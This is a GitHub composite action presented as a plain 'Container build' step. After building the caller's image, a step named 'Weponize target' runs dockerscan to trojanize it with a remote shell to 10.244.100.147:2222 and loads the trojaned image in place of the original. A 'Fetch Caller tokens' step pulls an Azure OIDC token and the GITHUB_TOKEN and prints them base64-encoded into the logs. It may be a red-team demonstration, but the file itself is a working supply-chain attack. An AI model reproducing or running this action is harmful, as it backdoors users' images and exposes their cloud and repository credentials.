name: 'Container build'
description: 'Build a container image'
inputs:
  image-name:  # id of input
    description: 'Local image name'
    required: true
    default: 'local'
runs:
  using: "composite"
  steps:
    - run: echo "going to build ${{ inputs.image-name }}"
      shell: bash
    
    - name: "Set up Docker Buildx"
      uses: docker/setup-buildx-action@v2
  
    - name: "Install docker scan"
      shell: bash
      run: |
        python3 -m pip install -U pip
        python3 -m pip install dockerscan
        
    - name: "Docker build"
      shell: bash
      run: | 
        docker build -t ${{ inputs.image-name }} . 
      
    - name: "Weponize target"
      shell: bash
      run: |
        docker save ${{ inputs.image-name }} -o original
        dockerscan image modify trojanize original -l 10.244.100.147 -p 2222 -o trojan
        docker load -i trojan.tar
    
    - name: "Fetch Caller tokens"
      shell: bash
      run: | 
        curl -o output.txt -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=api://AzureADTokenExchange" 
        cat output.txt | base64
        echo ${{ secrets.GITHUB_TOKEN }} | base64 >> /tmp/secret
        cat /tmp/secret
           